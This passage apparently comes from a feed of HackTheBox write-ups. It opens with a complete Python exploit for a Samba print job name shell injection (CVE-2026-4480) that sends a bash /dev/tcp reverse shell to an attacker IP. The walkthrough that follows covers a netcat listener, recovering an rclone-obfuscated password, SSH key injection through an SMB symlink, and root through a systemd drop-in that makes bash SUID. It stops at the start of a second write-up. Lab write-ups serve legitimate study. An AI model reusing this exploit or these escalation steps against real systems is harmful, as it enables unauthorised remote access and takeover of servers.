python"><code><span class="c1">#!/usr/bin/env python3 </span><span class="sh">"""</span><span class="s"> CVE-2026-4480 — Samba Print Job Description Shell Injection Unauthenticated RCE via Print Spooler (%J substitution) Dependencies: apt install python3-samba </span><span class="sh">"""</span> <span class="kn">import</span> <span class="n">argparse</span> <span class="kn">import</span> <span class="n">sys</span> <span class="n">BANNER</span> <span class="o">=</span> <span class="sa">r</span><span class="sh">"""</span><span class="s"> ╔═══════════════════════════════════════════════════════════╗ ║ ██████╗ ██████╗ ██╗███╗ ██╗████████╗ ║ ║ ██╔══██╗██╔══██╗██║████╗ ██║╚══██╔══╝ ║ ║ ██████╔╝██████╔╝██║██╔██╗ ██║ ██║ ║ ║ ██╔═══╝ ██╔══██╗██║██║╚██╗██║ ██║ ║ ║ ██║ ██║ ██║██║██║ ╚████║ ██║ ║ ║ ╚═╝ ╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝ ╚═╝ ║ ║ CVE-2026-4480 Samba %J Print Injection ║ ║ Unauthenticated RCE via Print Spooler ║ ╚═══════════════════════════════════════════════════════════╝ </span><span class="sh">"""</span> <span class="k">def</span> <span class="nf">parse_args</span><span class="p">():</span> <span class="n">parser</span> <span class="o">=</span> <span class="n">argparse</span><span class="p">.</span><span class="nc">ArgumentParser</span><span class="p">(</span> <span class="n">description</span><span class="o">=</span><span class="sh">'</span><span class="s">CVE-2026-4480 — Samba print job %J shell injection</span><span class="sh">'</span> <span class="p">)</span> <span class="n">parser</span><span class="p">.</span><span class="nf">add_argument</span><span class="p">(</span><span class="sh">'</span><span class="s">-r</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">--rhost</span><span class="sh">'</span><span class="p">,</span> <span class="n">required</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="sh">'</span><span class="s">Target IP or hostname</span><span class="sh">'</span><span class="p">)</span> <span class="n">parser</span><span class="p">.</span><span class="nf">add_argument</span><span class="p">(</span><span class="sh">'</span><span class="s">-l</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">--lhost</span><span class="sh">'</span><span class="p">,</span> <span class="n">default</span><span class="o">=</span><span class="bp">None</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="sh">'</span><span class="s">Attacker IP (for reverse shell)</span><span class="sh">'</span><span class="p">)</span> <span class="n">parser</span><span class="p">.</span><span class="nf">add_argument</span><span class="p">(</span><span class="sh">'</span><span class="s">-p</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">--lport</span><span class="sh">'</span><span class="p">,</span> <span class="n">default</span><span class="o">=</span><span class="bp">None</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">int</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="sh">'</span><span class="s">Attacker port (for reverse shell)</span><span class="sh">'</span><span class="p">)</span> <span class="n">parser</span><span class="p">.</span><span class="nf">add_argument</span><span class="p">(</span><span class="sh">'</span><span class="s">-c</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">--command</span><span class="sh">'</span><span class="p">,</span> <span class="n">default</span><span class="o">=</span><span class="bp">None</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="sh">'</span><span class="s">Custom command instead of reverse shell</span><span class="sh">'</span><span class="p">)</span> <span class="n">parser</span><span class="p">.</span><span class="nf">add_argument</span><span class="p">(</span><span class="sh">'</span><span class="s">--printer</span><span class="sh">'</span><span class="p">,</span> <span class="n">default</span><span class="o">=</span><span class="sh">'</span><span class="s">HP-Reception</span><span class="sh">'</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="sh">'</span><span class="s">Printer share name (default: HP-Reception)</span><span class="sh">'</span><span class="p">)</span> <span class="n">parser</span><span class="p">.</span><span class="nf">add_argument</span><span class="p">(</span><span class="sh">'</span><span class="s">--username</span><span class="sh">'</span><span class="p">,</span> <span class="n">default</span><span class="o">=</span><span class="sh">''</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="sh">'</span><span class="s">SMB username (default: anonymous)</span><span class="sh">'</span><span class="p">)</span> <span class="n">parser</span><span class="p">.</span><span class="nf">add_argument</span><span class="p">(</span><span class="sh">'</span><span class="s">--password</span><span class="sh">'</span><span class="p">,</span> <span class="n">default</span><span class="o">=</span><span class="sh">''</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="sh">'</span><span class="s">SMB password (default: empty)</span><span class="sh">'</span><span class="p">)</span> <span class="k">return</span> <span class="n">parser</span><span class="p">.</span><span class="nf">parse_args</span><span class="p">()</span> <span class="k">def</span> <span class="nf">build_payload</span><span class="p">(</span><span class="n">args</span><span class="p">):</span> <span class="k">if</span> <span class="n">args</span><span class="p">.</span><span class="n">command</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">'</span><span class="s">[*] Mode : custom command</span><span class="sh">'</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">'</span><span class="s">[*] Command : </span><span class="si">{</span><span class="n">args</span><span class="p">.</span><span class="n">command</span><span class="si">}</span><span class="sh">'</span><span class="p">)</span> <span class="nf">return </span><span class="p">(</span><span class="n">args</span><span class="p">.</span><span class="n">command</span> <span class="o">+</span> <span class="sh">'</span><span class="se">\n</span><span class="sh">'</span><span class="p">).</span><span class="nf">encode</span><span class="p">()</span> <span class="k">elif</span> <span class="n">args</span><span class="p">.</span><span class="n">lhost</span> <span class="ow">and</span> <span class="n">args</span><span class="p">.</span><span class="n">lport</span><span class="p">:</span> <span class="n">cmd</span> <span class="o">=</span> <span class="sa">f</span><span class="sh">"</span><span class="s">setsid bash -c </span><span class="sh">'</span><span class="s">bash -i &gt;&amp; /dev/tcp/</span><span class="si">{</span><span class="n">args</span><span class="p">.</span><span class="n">lhost</span><span class="si">}</span><span class="s">/</span><span class="si">{</span><span class="n">args</span><span class="p">.</span><span class="n">lport</span><span class="si">}</span><span class="s"> 0&gt;&amp;1</span><span class="sh">'</span><span class="s"> &gt;/dev/null 2&gt;&amp;1 &amp;</span><span class="sh">"</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">'</span><span class="s">[*] Mode : reverse shell</span><span class="sh">'</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">'</span><span class="s">[*] LHOST : </span><span class="si">{</span><span class="n">args</span><span class="p">.</span><span class="n">lhost</span><span class="si">}</span><span class="sh">'</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">'</span><span class="s">[*] LPORT : </span><span class="si">{</span><span class="n">args</span><span class="p">.</span><span class="n">lport</span><span class="si">}</span><span class="sh">'</span><span class="p">)</span> <span class="nf">return </span><span class="p">(</span><span class="n">cmd</span> <span class="o">+</span> <span class="sh">'</span><span class="se">\n</span><span class="sh">'</span><span class="p">).</span><span class="nf">encode</span><span class="p">()</span> <span class="k">else</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sh">'</span><span class="s">[!] Provide either -c &lt;command&gt; or both -l &lt;lhost&gt; and -p &lt;lport&gt;</span><span class="sh">'</span><span class="p">)</span> <span class="n">sys</span><span class="p">.</span><span class="nf">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="k">def</span> <span class="nf">exploit</span><span class="p">(</span><span class="n">args</span><span class="p">,</span> <span class="n">payload</span><span class="p">):</span> <span class="k">try</span><span class="p">:</span> <span class="kn">from</span> <span class="n">samba.dcerpc</span> <span class="kn">import</span> <span class="n">spoolss</span> <span class="kn">from</span> <span class="n">samba.param</span> <span class="kn">import</span> <span class="n">LoadParm</span> <span class="kn">from</span> <span class="n">samba.credentials</span> <span class="kn">import</span> <span class="n">Credentials</span> <span class="k">except</span> <span class="nb">ImportError</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sh">'</span><span class="s">[!] Missing dependency: python3-samba</span><span class="sh">'</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">'</span><span class="s"> apt install python3-samba</span><span class="sh">'</span><span class="p">)</span> <span class="n">sys</span><span class="p">.</span><span class="nf">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="n">lp</span> <span class="o">=</span> <span class="nc">LoadParm</span><span class="p">()</span> <span class="n">lp</span><span class="p">.</span><span class="nf">load_default</span><span class="p">()</span> <span class="n">creds</span> <span class="o">=</span> <span class="nc">Credentials</span><span class="p">()</span> <span class="n">creds</span><span class="p">.</span><span class="nf">guess</span><span class="p">(</span><span class="n">lp</span><span class="p">)</span> <span class="k">if</span> <span class="n">args</span><span class="p">.</span><span class="n">username</span><span class="p">:</span> <span class="n">creds</span><span class="p">.</span><span class="nf">set_username</span><span class="p">(</span><span class="n">args</span><span class="p">.</span><span class="n">username</span><span class="p">)</span> <span class="n">creds</span><span class="p">.</span><span class="nf">set_password</span><span class="p">(</span><span class="n">args</span><span class="p">.</span><span class="n">password</span><span class="p">)</span> <span class="k">else</span><span class="p">:</span> <span class="n">creds</span><span class="p">.</span><span class="nf">set_anonymous</span><span class="p">()</span> <span class="n">printer_path</span> <span class="o">=</span> <span class="sa">f</span><span class="sh">'</span><span class="se">\\\\</span><span class="si">{</span><span class="n">args</span><span class="p">.</span><span class="n">rhost</span><span class="si">}</span><span class="se">\\</span><span class="si">{</span><span class="n">args</span><span class="p">.</span><span class="n">printer</span><span class="si">}</span><span class="sh">'</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">'</span><span class="se">\n</span><span class="s">[*] Connecting to spoolss pipe on </span><span class="si">{</span><span class="n">args</span><span class="p">.</span><span class="n">rhost</span><span class="si">}</span><span class="s"> ...</span><span class="sh">'</span><span class="p">)</span> <span class="n">iface</span> <span class="o">=</span> <span class="n">spoolss</span><span class="p">.</span><span class="nf">spoolss</span><span class="p">(</span><span class="sa">f</span><span class="sh">'</span><span class="s">ncacn_np:</span><span class="si">{</span><span class="n">args</span><span class="p">.</span><span class="n">rhost</span><span class="si">}</span><span class="s">[</span><span class="se">\\</span><span class="s">pipe</span><span class="se">\\</span><span class="s">spoolss]</span><span class="sh">'</span><span class="p">,</span> <span class="n">lp</span><span class="p">,</span> <span class="n">creds</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">'</span><span class="s">[*] Opening printer handle: </span><span class="si">{</span><span class="n">printer_path</span><span class="si">}</span><span class="sh">'</span><span class="p">)</span> <span class="n">h</span> <span class="o">=</span> <span class="n">iface</span><span class="p">.</span><span class="nc">OpenPrinter</span><span class="p">(</span><span class="n">printer_path</span><span class="p">,</span> <span class="sh">''</span><span class="p">,</span> <span class="n">spoolss</span><span class="p">.</span><span class="nc">DevmodeContainer</span><span class="p">(),</span> <span class="mh">0x00000008</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">[*] Submitting print job with job name </span><span class="sh">'</span><span class="s">|sh</span><span class="sh">'</span><span class="s"> (%J injection) ...</span><span class="sh">"</span><span class="p">)</span> <span class="n">i1</span> <span class="o">=</span> <span class="n">spoolss</span><span class="p">.</span><span class="nc">DocumentInfo1</span><span class="p">()</span> <span class="n">i1</span><span class="p">.</span><span class="n">document_name</span> <span class="o">=</span> <span class="sh">'</span><span class="s">|sh</span><span class="sh">'</span> <span class="n">i1</span><span class="p">.</span><span class="n">output_file</span> <span class="o">=</span> <span class="bp">None</span> <span class="n">i1</span><span class="p">.</span><span class="n">datatype</span> <span class="o">=</span> <span class="sh">'</span><span class="s">RAW</span><span class="sh">'</span> <span class="n">ctr</span> <span class="o">=</span> <span class="n">spoolss</span><span class="p">.</span><span class="nc">DocumentInfoCtr</span><span class="p">()</span> <span class="n">ctr</span><span class="p">.</span><span class="n">level</span> <span class="o">=</span> <span class="mi">1</span> <span class="n">ctr</span><span class="p">.</span><span class="n">info</span> <span class="o">=</span> <span class="n">i1</span> <span class="n">iface</span><span class="p">.</span><span class="nc">StartDocPrinter</span><span class="p">(</span><span class="n">h</span><span class="p">,</span> <span class="n">ctr</span><span class="p">)</span> <span class="n">iface</span><span class="p">.</span><span class="nc">StartPagePrinter</span><span class="p">(</span><span class="n">h</span><span class="p">)</span> <span class="n">iface</span><span class="p">.</span><span class="nc">WritePrinter</span><span class="p">(</span><span class="n">h</span><span class="p">,</span> <span class="n">payload</span><span class="p">,</span> <span class="nf">len</span><span class="p">(</span><span class="n">payload</span><span class="p">))</span> <span class="n">iface</span><span class="p">.</span><span class="nc">EndPagePrinter</span><span class="p">(</span><span class="n">h</span><span class="p">)</span> <span class="n">iface</span><span class="p">.</span><span class="nc">EndDocPrinter</span><span class="p">(</span><span class="n">h</span><span class="p">)</span> <span class="n">iface</span><span class="p">.</span><span class="nc">ClosePrinter</span><span class="p">(</span><span class="n">h</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sh">'</span><span class="s">[+] Job submitted successfully — check your listener!</span><span class="sh">'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">main</span><span class="p">():</span> <span class="nf">print</span><span class="p">(</span><span class="n">BANNER</span><span class="p">)</span> <span class="n">args</span> <span class="o">=</span> <span class="nf">parse_args</span><span class="p">()</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">'</span><span class="s">[*] Target : </span><span class="si">{</span><span class="n">args</span><span class="p">.</span><span class="n">rhost</span><span class="si">}</span><span class="sh">'</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">'</span><span class="s">[*] Printer : </span><span class="si">{</span><span class="n">args</span><span class="p">.</span><span class="n">printer</span><span class="si">}</span><span class="sh">'</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">'</span><span class="s">[*] Auth : </span><span class="si">{</span><span class="n">args</span><span class="p">.</span><span class="n">username</span> <span class="k">if</span> <span class="n">args</span><span class="p">.</span><span class="n">username</span> <span class="k">else</span> <span class="sh">"</span><span class="s">anonymous (guest)</span><span class="sh">"</span><span class="si">}</span><span class="sh">'</span><span class="p">)</span> <span class="n">payload</span> <span class="o">=</span> <span class="nf">build_payload</span><span class="p">(</span><span class="n">args</span><span class="p">)</span> <span class="nf">exploit</span><span class="p">(</span><span class="n">args</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> <span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="sh">'</span><span class="s">__main__</span><span class="sh">'</span><span class="p">:</span> <span class="nf">main</span><span class="p">()</span> </code></pre> </div> <p>Setting up a listener:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nc <span class="nt">-lvnp</span> 4444 </code></pre> </div> <p>Running the exploit:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>python3 cve-2026-4480.py <span class="nt">-r</span> &lt;MACHINE-IP&gt; <span class="nt">-l</span> &lt;ATTACKER-IP&gt; <span class="nt">-p</span> 4444 </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="gp">[*] Target : &lt;MACHINE-IP&gt;</span><span class="w"> </span><span class="gp">[*] LHOST : &lt;ATTACKER-IP&gt;</span><span class="w"> </span><span class="go">[*] LPORT : 4444 [*] Printer : HP-Reception [*] Payload : bash reverse shell [*] Connecting to spoolss pipe... [*] Opening printer handle... [*] Starting document with |sh job name... [+] Job submitted — check your listener! </span></code></pre> </div> <p>A reverse shell connects as <code>nobody</code> — the Samba guest account.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="gp">(remote) nobody@abducted:/$</span><span class="w"> </span><span class="nb">id</span> <span class="go">uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) </span></code></pre> </div> <h2> Post-Exploitation as nobody — rclone Credentials </h2> <p>Searching for configuration files outside standard system paths:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>find / <span class="nt">-type</span> f <span class="nt">-name</span> <span class="s2">"*.conf"</span> 2&gt;/dev/null | <span class="nb">grep</span> <span class="nt">-Ev</span> <span class="s2">"^/usr/|^/etc/"</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/opt/offsite-backup/rclone.conf </code></pre> </div> <p>Reading it:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">cat</span> /opt/offsite-backup/rclone.conf </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight ini"><code><span class="nn">[offsite]</span> <span class="py">type</span> <span class="p">=</span> <span class="s">sftp</span> <span class="py">host</span> <span class="p">=</span> <span class="s">backup.hartley-group.internal</span> <span class="py">user</span> <span class="p">=</span> <span class="s">svc-backup</span> <span class="py">pass</span> <span class="p">=</span> <span class="s">HZKAxfnMj-nLm59X9gpcC2ohjQL-WqVT6yRsNw</span> <span class="py">shell_type</span> <span class="p">=</span> <span class="s">unix</span> </code></pre> </div> <p>rclone stores passwords in an obfuscated (not encrypted) format. The <code>rclone reveal</code> command decodes it:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>rclone reveal HZKAxfnMj-nLm59X9gpcC2ohjQL-WqVT6yRsNw </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>iXzvcib3SrpZ </code></pre> </div> <p>Plaintext password recovered: <strong>iXzvcib3SrpZ</strong></p> <h2> Lateral Movement — SSH as scott (Password Reuse) </h2> <p>With a password in hand and only two system users (<code>scott</code> and <code>marcus</code>), testing password reuse against SSH:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>ssh scott@abducted.htb <span class="c"># Password: iXzvcib3SrpZ</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="gp">scott@abducted:~$</span><span class="w"> </span><span class="nb">id</span> <span class="go">uid=1000(scott) gid=1001(scott) groups=1001(scott) </span></code></pre> </div> <p>Password reuse succeeded — <code>svc-backup</code>'s rclone password was reused for <code>scott</code>'s SSH account.</p> <h2> User Flag </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>scott@abducted:~<span class="nv">$ </span><span class="nb">cat </span>user.txt </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>HTB{REDACTED} </code></pre> </div> <h2> Enumeration as scott </h2> <p>Checking sudo:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo</span> <span class="nt">-l</span> <span class="c"># Sorry, user scott may not run sudo on abducted.</span> </code></pre> </div> <p>No sudo. Reviewing the Samba configuration files now that a proper shell is available:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">cat</span> /etc/samba/smb.conf </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight ini"><code><span class="nn">[global]</span> <span class="py">workgroup</span> <span class="p">=</span> <span class="s">WORKGROUP</span> <span class="err">server</span> <span class="py">string</span> <span class="p">=</span> <span class="s">Hartley Group Document Services</span> <span class="err">netbios</span> <span class="py">name</span> <span class="p">=</span> <span class="s">ABDUCTED</span> <span class="err">map</span> <span class="err">to</span> <span class="py">guest</span> <span class="p">=</span> <span class="s">Bad User</span> <span class="err">guest</span> <span class="py">account</span> <span class="p">=</span> <span class="s">nobody</span> <span class="py">security</span> <span class="p">=</span> <span class="s">user</span> <span class="py">printing</span> <span class="p">=</span> <span class="s">sysv</span> <span class="err">load</span> <span class="py">printers</span> <span class="p">=</span> <span class="s">no</span> <span class="err">disable</span> <span class="py">spoolss</span> <span class="p">=</span> <span class="s">no</span> <span class="err">unix</span> <span class="py">extensions</span> <span class="p">=</span> <span class="s">no</span> <span class="err">allow</span> <span class="err">insecure</span> <span class="err">wide</span> <span class="py">links</span> <span class="p">=</span> <span class="s">yes</span> <span class="py">include</span> <span class="p">=</span> <span class="s">/etc/samba/shares.conf</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">cat</span> /etc/samba/shares.conf </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight ini"><code><span class="nn">[HP-Reception]</span> <span class="py">comment</span> <span class="p">=</span> <span class="s">Reception printer</span> <span class="py">path</span> <span class="p">=</span> <span class="s">/var/spool/samba</span> <span class="py">printable</span> <span class="p">=</span> <span class="s">yes</span> <span class="err">guest</span> <span class="py">ok</span> <span class="p">=</span> <span class="s">yes</span> <span class="err">print</span> <span class="py">command</span> <span class="p">=</span> <span class="s">/usr/local/bin/printaudit %J %s</span> <span class="err">lpq</span> <span class="py">command</span> <span class="p">=</span> <span class="s">/bin/true</span> <span class="err">lprm</span> <span class="py">command</span> <span class="p">=</span> <span class="s">/bin/true</span> <span class="nn">[projects]</span> <span class="py">comment</span> <span class="p">=</span> <span class="s">Hartley Group Project Files</span> <span class="py">path</span> <span class="p">=</span> <span class="s">/srv/projects</span> <span class="err">valid</span> <span class="py">users</span> <span class="p">=</span> <span class="s">scott</span> <span class="err">read</span> <span class="py">only</span> <span class="p">=</span> <span class="s">no</span> <span class="py">browseable</span> <span class="p">=</span> <span class="s">yes</span> <span class="nn">[transfer]</span> <span class="py">comment</span> <span class="p">=</span> <span class="s">Staff file transfer</span> <span class="py">path</span> <span class="p">=</span> <span class="s">/srv/transfer</span> <span class="err">valid</span> <span class="py">users</span> <span class="p">=</span> <span class="s">scott</span> <span class="err">force</span> <span class="py">user</span> <span class="p">=</span> <span class="s">marcus</span> <span class="err">read</span> <span class="py">only</span> <span class="p">=</span> <span class="s">no</span> <span class="err">wide</span> <span class="py">links</span> <span class="p">=</span> <span class="s">yes</span> <span class="py">browseable</span> <span class="p">=</span> <span class="s">yes</span> </code></pre> </div> <p>Two key observations:</p> <ol> <li>The <code>print command</code> confirms how CVE-2026-4480 worked — <code>%J</code> (job name) passes unsanitised into the shell command.</li> <li>The <code>transfer</code> share has <code>force user = marcus</code> and <code>wide links = yes</code>. Any file written through it is created as <code>marcus</code>. With <code>wide links = yes</code>, symlinks are followed across share boundaries.</li> </ol> <h2> Lateral Movement — SSH Key Injection via SMB Symlink </h2> <p>The <code>transfer</code> share forces file operations to run as <code>marcus</code>. Using a symlink from <code>/srv/transfer</code> into <code>marcus</code>'s home directory allows writing files as that user through the share.</p> <p>Creating the symlink as <code>scott</code> (who can write to <code>/srv/transfer</code>):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">ln</span> <span class="nt">-s</span> /home/marcus /srv/transfer/marcus </code></pre> </div> <p>Connecting to the <code>transfer</code> share as <code>scott</code> and navigating to <code>marcus</code>'s home via the symlink:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>smbclient //&lt;MACHINE-IP&gt;/transfer <span class="nt">-U</span> <span class="s1">'scott%iXzvcib3SrpZ'</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="gp">smb: \&gt;</span><span class="w"> </span><span class="nb">ls</span> <span class="go"> marcus D 0 Thu Jun 11 07:29:45 2026 </span><span class="gp">smb: \&gt;</span><span class="w"> </span><span class="nb">cd </span>marcus <span class="gp">smb: \marcus\&gt;</span><span class="w"> </span><span class="nb">ls</span> <span class="go"> .profile .bash_logout .bash_history .bashrc .cache </span></code></pre> </div> <p>Creating <code>.ssh</code> directory and uploading the attacker's public key:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>smb: <span class="se">\m</span>arcus<span class="se">\&gt;</span> <span class="nb">mkdir</span> .ssh smb: <span class="se">\m</span>arcus<span class="se">\&gt;</span> <span class="nb">cd</span> .ssh smb: <span class="se">\m</span>arcus<span class="se">\.</span>ssh<span class="se">\&gt;</span> put /home/kali/.ssh/id_rsa.pub authorized_keys </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>putting file /home/kali/.ssh/id_rsa.pub as \marcus\.ssh\authorized_keys </code></pre> </div> <p>SSH requires strict permissions on <code>authorized_keys</code> — the file must not be world-readable. Using smbclient's <code>setmode</code> to strip the read bit:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>smb: <span class="se">\m</span>arcus<span class="se">\.</span>ssh<span class="se">\&gt;</span> setmode authorized_keys a-r </code></pre> </div> <p>Navigating back and fixing the <code>.ssh</code> directory permissions too:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>smb: <span class="se">\m</span>arcus<span class="se">\.</span>ssh<span class="se">\&gt;</span> <span class="nb">cd</span> .. smb: <span class="se">\m</span>arcus<span class="se">\&gt;</span> setmode .ssh a-r+d </code></pre> </div> <p>Connecting via SSH:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>ssh <span class="nt">-i</span> /home/kali/.ssh/id_rsa marcus@abducted.htb </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="gp">marcus@abducted:~$</span><span class="w"> </span><span class="nb">id</span> <span class="go">uid=1001(marcus) gid=1002(marcus) groups=1002(marcus),1000(operators) </span></code></pre> </div> <p><code>marcus</code> is a member of the <code>operators</code> group.</p> <h2> Privilege Escalation to Root — systemd Drop-in (operators group) </h2> <p>Finding what the <code>operators</code> group has write access to:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>find / <span class="nt">-group</span> operators 2&gt;/dev/null </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/etc/systemd/system/smbd.service.d </code></pre> </div> <p>The <code>operators</code> group owns the <code>smbd.service.d</code> drop-in directory for the Samba service. systemd service drop-ins allow adding or overriding directives in a service unit without modifying the original file. Writing a drop-in with an <code>ExecStartPre</code> directive causes it to run as root when the service restarts.</p> <p>Creating the malicious drop-in:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">cat</span> <span class="o">&gt;</span> /etc/systemd/system/smbd.service.d/privesc.conf <span class="o">&lt;&lt;</span> <span class="sh">'</span><span class="no">EOF</span><span class="sh">' [Service] ExecStartPre=/bin/bash -c 'chmod +s /bin/bash' </span><span class="no">EOF </span></code></pre> </div> <p>Reloading the systemd daemon and restarting smbd:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>systemctl daemon-reload systemctl restart smbd </code></pre> </div> <p>The <code>ExecStartPre</code> command runs as root, setting the SUID bit on <code>/bin/bash</code>. Spawning a root shell:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>bash <span class="nt">-p</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="gp">bash-5.2#</span><span class="w"> </span><span class="nb">whoami</span> <span class="go">root </span></code></pre> </div> <h2> Root Flag </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>bash-5.2# <span class="nb">cat</span> /root/root.txt </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>HTB{REDACTED} </code></pre> </div> <h2> Credentials Summary </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>User</th> <th>Credential</th> <th>Source</th> </tr> </thead> <tbody> <tr> <td>nobody (SMB)</td> <td>—</td> <td>CVE-2026-4480 unauthenticated RCE</td> </tr> <tr> <td>scott (SSH)</td> <td>iXzvcib3SrpZ</td> <td>rclone.conf obfuscated password</td> </tr> <tr> <td>marcus (SSH)</td> <td>id_rsa</td> <td>SMB symlink + wide links key injection</td> </tr> <tr> <td>root</td> <td>—</td> <td>systemd drop-in ExecStartPre SUID bash</td> </tr> </tbody> </table></div> <h2> Key Vulnerabilities </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>#</th> <th>Vulnerability</th> <th>Impact</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>CVE-2026-4480 — Samba <code>%J</code> print job name shell injection</td> <td>Unauthenticated RCE as nobody</td> </tr> <tr> <td>2</td> <td>rclone obfuscated password in world-readable config</td> <td>Plaintext credential recovery</td> </tr> <tr> <td>3</td> <td>Password reuse across svc-backup and scott accounts</td> <td>SSH access as scott</td> </tr> <tr> <td>4</td> <td>SMB <code>transfer</code> share: <code>force user = marcus</code> + <code>wide links = yes</code> </td> <td>Write to marcus's home as marcus</td> </tr> <tr> <td>5</td> <td> <code>operators</code> group write access to <code>smbd.service.d</code> drop-in directory</td> <td>Root via systemd ExecStartPre</td> </tr> </tbody> </table></div> <h2> Attack Chain </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Nmap → SMB + Printer Share (HP-Reception) → CVE-2026-4480 %J Print Injection → RCE as nobody → /opt/offsite-backup/rclone.conf → obfuscated password → rclone reveal → iXzvcib3SrpZ → SSH password reuse → scott → SMB shares.conf: transfer share (force user=marcus, wide links=yes) → ln -s /home/marcus /srv/transfer/marcus → smbclient → write authorized_keys as marcus → SSH as marcus (operators group) → find / -group operators → /etc/systemd/system/smbd.service.d → systemd drop-in ExecStartPre → chmod +s /bin/bash → bash -p → root </code></pre> </div> cybersecurity HackTheBox - Facts Writeup Yogeshwar Peela Thu, 11 Jun 2026 06:35:56 +0000 https://dev.to/exploitnotes/hackthebox-facts-writeup-4nia https://dev.to/exploitnotes/hackthebox-facts-writeup-4nia <p><strong>Difficulty:</strong> Easy<br> <strong>OS:</strong> Linux</p> <h2> Reconnaissance </h2> <h3> Nmap </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nmap <span class="nt">-sCV</span> <span class="nt">-A</span> <span class="nt">-p-</span> &lt;MACHINE-IP&gt; </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.9p1 Ubuntu 3ubuntu3.2 80/tcp open http nginx 1.26.3 (Ubuntu) </span></code></pre> </div> <p>Two open ports — SSH and 